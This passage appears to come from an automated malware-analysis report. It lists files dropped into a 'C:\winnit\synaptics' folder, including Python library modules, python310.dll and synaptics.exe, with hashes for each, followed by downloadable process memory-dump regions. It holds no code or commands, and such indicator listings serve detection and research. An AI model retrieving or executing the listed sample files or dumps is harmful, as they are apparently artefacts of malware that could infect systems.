8d644766de1b3d66fd123091d9193efd7de68406a4dcd50c5a28258613204045dc0ba56c01c4660feb90e6c8e0609cdda2b603d6db0ded70ca40863e3c702010

Download Submit
C:\winnit\synaptics\lib\encodings\__pycache__\utf_8.cpython-310.pyc

Filesize
1KB

MD5
9ccee2d8c368edd47f3a3b228a23434c

SHA1
05fe801ed4abf43fa494f022bca68fe63b25a825

SHA256
a01a6c262f23d86222c85b9367ecb75940d626a4f5a991fe0566e2ef2df7d05c

SHA512
d2ddda52d6cb6ea688f3849d226ea97568699bc7688f89dff37036e579e09af19b36e2140876ac71f9b15c6f4ec5ab02193b8274ac7d44df81a74f19187456b2

Download Submit
C:\winnit\synaptics\lib\encodings\aliases.py

Filesize
15KB

MD5
ff23f6bb45e7b769787b0619b27bc245

SHA1
60172e8c464711cf890bc8a4feccff35aa3de17a

SHA256
1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8

SHA512
ea6b685a859ef2fcd47b8473f43037341049b8ba3eea01d763e2304a2c2adddb01008b58c14b4274d9af8a07f686cd337de25afeb9a252a426d85d3b7d661ef9

Download Submit
C:\winnit\synaptics\lib\encodings\cp1252.py

Filesize
13KB

MD5
52084150c6d8fc16c8956388cdbe0868

SHA1
368f060285ea704a9dc552f2fc88f7338e8017f2

SHA256
7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519

SHA512
77e7921f48c9a361a67bae80b9eec4790b8df51e6aff5c13704035a2a7f33316f119478ac526c2fdebb9ef30c0d7898aea878e3dba65f386d6e2c67fe61845b4

Download Submit
C:\winnit\synaptics\lib\encodings\utf_8.py

Filesize
1KB

MD5
f932d95afcaea5fdc12e72d25565f948

SHA1
2685d94ba1536b7870b7172c06fe72cf749b4d29

SHA256
9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e

SHA512
a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6

Download Submit
C:\winnit\synaptics\lib\enum.py

Filesize
39KB

MD5
f87cac79ab835bac55991134e9c64a35

SHA1
63d509bf705342a967cdd1af116fe2e18cd9346f

SHA256
303afea74d4a1675a48c6a8d7c4764da68dbef1092dc440e4bf3c901f8155609

SHA512
9a087073e285f0f19ab210eceefb9e2284fffd87c273413e66575491023a8dcb4295b7c25388f1c2e8e16a74d3b3bff13ec725be75dc827541e68364e3a95a6d

Download Submit
C:\winnit\synaptics\lib\functools.py

Filesize
38KB

MD5
e451c9675e4233de278acf700ac7395f

SHA1
1e7d4c5db5fc692540c31e1b4db4679051eb5df8

SHA256
b4698d03b4d366f2b032f5de66b8181ed8e371c0d7d714b7672432e18d80636b

SHA512
4db40159db7427ce05d36aa3a6b05151742e6c122dfbdc679c10dcc667fc999ff1302bb2e2be6f58b895911cf436b27ad78fd64ccf077deb94046667520111b9

Download Submit
C:\winnit\synaptics\lib\genericpath.py

Filesize
5KB

MD5
5ad610407613defb331290ee02154c42

SHA1
3ff9028bdf7346385607b5a3235f5ff703bcf207

SHA256
2e162781cd02127606f3f221fcaa19c183672d1d3e20fdb83fe9950ab5024244

SHA512
9a742c168a6c708a06f4307abcb92cede02400bf53a004669b08bd3757d8db7c660934474ec379c0464e17ffd25310dbab525b6991cf493e97dcd49c4038f9b7

Download Submit
C:\winnit\synaptics\lib\io.py

Filesize
4KB

MD5
99710b1a7d4045b9334f8fc11b084a40

SHA1
7032facde0106f7657f25fb1a80c3292f84ec394

SHA256
fe91b067fd544381fcd4f3df53272c8c40885c1811ac2165fd6686623261bc5d

SHA512
ac1b4562ed507bcccc2bdfd8cab6872a37c081be4d5398ba1471d84498c322dcaa176eb1dda23daaddd4cebfcd820b319ddcb33c3972ebf34b32393ad8bd0412

Download Submit
C:\winnit\synaptics\lib\keyword.py

Filesize
1KB

MD5
dc5106aabd333f8073ffbf67d63f1dee

SHA1
e203519ccd77f8283e1ea9d069c6e8de110e31d9

SHA256
ebd724ed7e01ce97ecb3a6b296001fa4395bb48161658468855b43cff0e6eebb

SHA512
a2817944d4d2fb9edd2e577fb0d6b93337e1b3f98d31ad157557363146751c4b23174d69c35ee5d292845dedcd5ef32eeac52b877d96eb108c819415d5cf300e

Download Submit
C:\winnit\synaptics\lib\ntpath.py

Filesize
29KB

MD5
7d31906afdc5e38f5f63bfeeb41e2ef2

SHA1
bbefd95b28bac9e58e1f1201ae2b39bbe9c17e5f

SHA256
e34494af36d8b596c98759453262d2778a893daa766f96e1bb1ef89d8b387812

SHA512
641b6b2171bb9aae3603be2cbcc7dd7d45968afeb7e0a9d65c914981957ba51b2a1b7d4d9c6aec88cf92863844761accdeca62db62a13d2bc979e5279d7f87a0

Download Submit
C:\winnit\synaptics\lib\operator.py

Filesize
10KB

MD5
5ce128b0b666d733f0be7dff2da87f7c

SHA1
b73f3ea48ada4eca01fbed4a2d22076ad03c1f74

SHA256
4b14013b84ffe4be36fc3a4b847006ba1182596612d2a2ab42a6e94ff990b462

SHA512
557557f4bf9a6f238340596aa84f079318f96c44e26804a3083a6359c36bdb6cef5d5a2d5a698202d36bf6b9c7d0d7625b4e2b72b0a4582a78569e104f9f755a

Download Submit
C:\winnit\synaptics\lib\os.py

Filesize
39KB

MD5
8180e937086a657d6b15418ff4215c35

SHA1
232e8f00eed28be655704eccdab3e84d66cc8f53

SHA256
521f714dc038e0faa53e7de3dbccae0631d96a4d2d655f88b970bd8cf29ec750

SHA512
a682a8f878791510a27de3a0e407889d3f37855fb699320b4355b48cb23de69b89dadd77fdcca33ef8e5855278e584b8e7947b626d6623c27521d87eae5a30d5

Download Submit
C:\winnit\synaptics\lib\re.py

Filesize
15KB

MD5
f04d4a880157a5a39bbafc0073b8b222

SHA1
92515b53ee029b88b517c1f2f26f6d022561f9b4

SHA256
5ae8929f8c0fb9a0f31520d0a909e5637d86c6debb7c0b8cbacc710c721f9f7d

SHA512
556aaacfc4237b8ab611922e2052407a6be98a7fb6e36e8d3ed14412b22e50abac617477f53acfa99dba1824b379c86376991739d68749eb5f162e020e7999cb

Download Submit
C:\winnit\synaptics\lib\reprlib.py

Filesize
5KB

MD5
e7c51384148475bffeb9729df4b33b69

SHA1
58109e3ae253b6f9bf94bd8a2c880beae0eddf94

SHA256
3be6cde6103319b3ca44bbc4d40c60e0bcb14a53e93e2578e8e4e850f4a8c66b

SHA512
a7c81fd784e537da08a8ead5a6c635b66123de815b73fae2b9f1662cf49af4c9e41e648075cc0ee2a64c034fa38da4a4e90163e9b955b17d20490eeb86004341

Download Submit
C:\winnit\synaptics\lib\site-packages\_distutils_hack\__init__.py

Filesize
5KB

MD5
128079c84580147fd04e7e070340cb16

SHA1
9bd1ae6606ccd247f80960abbc7d7f78aeec4b86

SHA256
4d27a48545b57dd137ae35376fcf326d2064271084a487960686f8704b94de4a

SHA512
cf9d54474347d15ad1b8b89b2e58b850ad3595eec54173745bde86f94f75b39634be195a3aef69d71cb709ecff79c572a66b1458a86fa2779f043a83a5d4cc4c

Download Submit
C:\winnit\synaptics\lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc

Filesize
7KB

MD5
dd0fa466ee8d59a0804d113280ddedd4

SHA1
8c87b38045b7ed39d05a87955d2f36f74d1cb18b

SHA256
2b79168012f3557da5301a458d5bed9796f3e201d1d8e4be0ebf5b40a9d7c48c

SHA512
e9acfe32d2127b5f33ea1a67f639335bebca3cd17f1fb76d95e06f1e9139904a455730e036c0e536b3b6d768b937069fcca93062900c30461f38e6a16e9b31c7

Download Submit
C:\winnit\synaptics\lib\site-packages\distutils-precedence.pth

Filesize
151B

MD5
18d27e199b0d26ef9b718ce7ff5a8927

SHA1
ea9c9bfc82ad47e828f508742d7296e69d2226e4

SHA256
2638ce9e2500e572a5e0de7faed6661eb569d1b696fcba07b0dd223da5f5d224

SHA512
b8504949f3ddf0089164b0296e8371d7dcdd4c3761fb17478994f5e6943966528a45a226eba2d5286b9c799f0eb8c99bd20cbd8603a362532b3a65dd058fa42e

Download Submit
C:\winnit\synaptics\lib\site-packages\pywin32.pth

Filesize
178B

MD5
322bf8d4899fb978d3fac34de1e476bb

SHA1
467808263e26b4349a1faf6177b007967fbc6693

SHA256
4f67ff92af0ea38bf18ac308efd976f781d84e56f579c603ed1e8f0c69a17f8d

SHA512
d7264690d653ac6ed4b3d35bb22b963afc53609a9d14187a4e0027528b618c224ed38e225330ceae2565731a4e694a6146b3214b3dcee75b053c8ae79f24a9dd

Download Submit
C:\winnit\synaptics\lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc

Filesize
503B

MD5
ca41807efdbef101fd29f497438906f1

SHA1
531762cb9766e6f5ca2cc085127b81cfd96afac6

SHA256
9849c7892ec2004c6c50e019b6ed6c3d94f96dbc5f6b7153543f63b1e34ebec7

SHA512
624130293d77b57097868887dfb91b7a4471e5e849d254841a80847e6d3b26a8412ed4f5e2617ce8c879c3d8967e9b576a34f7725a5c4766ca3071493cdd0dbb

Download Submit
C:\winnit\synaptics\lib\site-packages\win32\lib\pywin32_bootstrap.py

Filesize
1KB

MD5
5d28a84aa364bcd31fdb5c5213884ef7

SHA1
0874dca2ad64e2c957b0a8fd50588fb6652dd8ee

SHA256
e298ddcfcb0232257fcaa330844845a4e7807c4e2b5bd938929ed1791cd9d192

SHA512
24c1ad9ce1d7e7e3486e8111d8049ef1585cab17b97d29c7a4eb816f7bdf34406aa678f449f8c680b7f8f3f3c8bc164edac95ccb15da654ef9df86c5beb199a5

Download Submit
C:\winnit\synaptics\lib\site.py

Filesize
22KB

MD5
23cf5b302f557f7461555a35a0dc8c15

SHA1
50daac7d361ced925b7fd331f46a3811b2d81238

SHA256
73607e7b809237d5857b98e2e9d503455b33493cde1a03e3899aa16f00502d36

SHA512
e3d8449a8c29931433dfb058ab21db173b7aed8855871e909218da0c36beb36a75d2088a2d6dd849ec3e66532659fdf219de00184b2651c77392994c5692d86b

Download Submit
C:\winnit\synaptics\lib\sre_compile.py

Filesize
28KB

MD5
f09eb9e5e797b7b1b4907818fef9b165

SHA1
8f9e2bc760c7a2245cae4628caecdf1ada35f46d

SHA256
cdb9bdcab7a6fa98f45ef47d3745ac86725a89c5baf80771f0451d90058a21d6

SHA512
e71fb7b290bb46aee4237dbf7ff4adc2f4491b1fc1c48bd414f5ce376d818564fd37b6113997a630393d9342179fcb7ce0462d6aad5115e944f8c0ccab1fa503

Download Submit
C:\winnit\synaptics\lib\sre_constants.py

Filesize
7KB

MD5
bca79743254aa4bc94dace167a8b0871

SHA1
d1da34fbe097f054c773ff8040d2e3852c3d77f1

SHA256
513373cde5987d794dc429f7c71a550fe49e274bf82d0856bec40dca4079dadc

SHA512
1c0ab3ce7b24acd2ffbd39a9d4bf343aa670525465b265a6572bdec2036b1a72aaafe07afe63a21246456427f10be519aeee9fc707cbb0151ac1e180239ad2af

Download Submit
C:\winnit\synaptics\lib\sre_parse.py

Filesize
40KB

MD5
d1af43b8e4f286625a0144373cf0de28

SHA1
7fbd019519c5223d67311e51150595022d95fe86

SHA256
c029a310e36013abc15610ff09a1e31d9fb1a0e4c60293150722c08fc9e7b090

SHA512
75ab3b5a2aad2ac44ab63028982a94bb718aaf6c67f6b59a8edc8c2c49287dd16667923e1889c68404053d61df742864a6e85545bbfb17624a5844bb049767f9

Download Submit
C:\winnit\synaptics\lib\stat.py

Filesize
5KB

MD5
7a7143cbe739708ce5868f02cd7de262

SHA1
e915795b49b849e748cdbd8667c9c89fcdff7baf

SHA256
e514fd41e2933dd1f06be315fb42a62e67b33d04571435a4815a18f490e0f6ce

SHA512
7ecf6ac740b734d26d256fde2608375143c65608934aa51df7af34a1ee22603a790adc5b3d67d6944ba40f6f41064fa4d6957e000de441d99203755820e34d53

Download Submit
C:\winnit\synaptics\lib\types.py

Filesize
10KB

MD5
c58c7a4ee7e383be91cd75264d67b13b

SHA1
60914b6f1022249cd5d0cf8caa7adb4dcf34c9ea

SHA256
0d3a1a2f8f0e286ad9eadbb397af0c2dc4bef0c71a7ebe4b51ded9862a301b01

SHA512
9450e434c0d4abb93fa4ca2049626c05f65d4fb796d17ac5e504b8ec086abec00dcdc54319c1097d20e6e1eec82529993482e37a0bf9675328421f1fa073bf04

Download Submit
C:\winnit\synaptics\python310.dll

Filesize
4.0MB

MD5
73cadab187ad5e06bef954190478e3aa

SHA1
18ab7b6fe86193df108a5a09e504230892de453e

SHA256
b4893ed4890874d0466fca49960d765dd4c2d3948a47d69584f5cc51bbbfa4c9

SHA512
b2ebe575f3252ff7abebab23fc0572fc8586e80d902d5a731fb7bd030faa47d124240012e92ffe41a841fa2a65c7fb110af7fb9ab6e430395a80e925283e2d4d

Download Submit
C:\winnit\synaptics\synaptics.exe

Filesize
97KB

MD5
8ad6c16026ff6c01453d5fa392c14cb4

SHA1
69535b162ff00a1454ba62d6faba549b966d937f

SHA256
ff507b25af4b3e43be7e351ec12b483fe46bdbc5656baae6ad0490c20b56e730

SHA512
6d8042a6c8e72f76b2796b6a33978861aba2cfd8b3f8de2088bbff7ea76d91834c86fa230f16c1fddae3bf52b101c61cb19ea8d30c6668408d86b2003abd0967

Download Submit
memory/1536-2486-0x00007FFB9CC40000-0x00007FFB9D1E9000-memory.dmp

Filesize
5.7MB

Download
memory/1536-2487-0x00007FFB9C790000-0x00007FFB9CC3B000-memory.dmp

Filesize
4.7MB

Download
memory/2512-8091-0x0000000007040000-0x00000000070FE000-memory.dmp

Filesize
760KB

Download
memory/2512-8271-0x0000000007740000-0x0000000007D58000-memory.dmp

Filesize
6.1MB

Download
memory/2512-7875-0x0000000004BA0000-0x0000000004BFE000-memory.dmp

Filesize
376KB

Download
memory/3612-2549-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2523-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-10409-0x0000000008230000-0x0000000008280000-memory.dmp

Filesize
320KB

Download
memory/3612-2495-0x0000000003DD0000-0x0000000003E44000-memory.dmp

Filesize
464KB

Download
memory/3612-2496-0x0000000006C70000-0x0000000006CE0000-memory.dmp

Filesize
448KB

Download
memory/3612-2497-0x0000000006D20000-0x0000000006DBC000-memory.dmp

Filesize
624KB

Download
memory/3612-2515-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2513-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2555-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2554-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2551-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-10408-0x00000000081C0000-0x00000000081D2000-memory.dmp

Filesize
72KB

Download
memory/3612-2547-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2545-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2543-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2541-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2539-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2537-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2535-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2533-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2529-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2527-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2525-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-5383-0x00000000072C0000-0x00000000073B2000-memory.dmp

Filesize
968KB

Download
memory/3612-2521-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2519-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2517-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2511-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2509-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2507-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2503-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2501-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2557-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2531-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2505-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2499-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-2498-0x0000000006D20000-0x0000000006DB6000-memory.dmp

Filesize
600KB

Download
memory/3612-5381-0x0000000006ED0000-0x0000000006EFC000-memory.dmp

Filesize
176KB

Download
memory/3612-5382-0x0000000006F00000-0x0000000006F4C000-memory.dmp

Filesize
304KB

Download
memory/5084-2491-0x0000000005280000-0x00000000052E6000-memory.dmp

Filesize
408KB

Download
memory/5084-2490-0x00000000057C0000-0x0000000005D64000-memory.dmp

Filesize
5.6MB

Download
memory/5084-2489-0x0000000005000000-0x000000000509C000-memory.dmp

Filesize
624KB

Download
memory/5084-2488-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/5084-2492-0x0000000005490000-0x0000000005522000-memory.dmp

Filesize
584KB

Download
memory/5084-2493-0x00000000057B0000-0x00000000057BA000-memory.dmp

Filesize
40KB

Download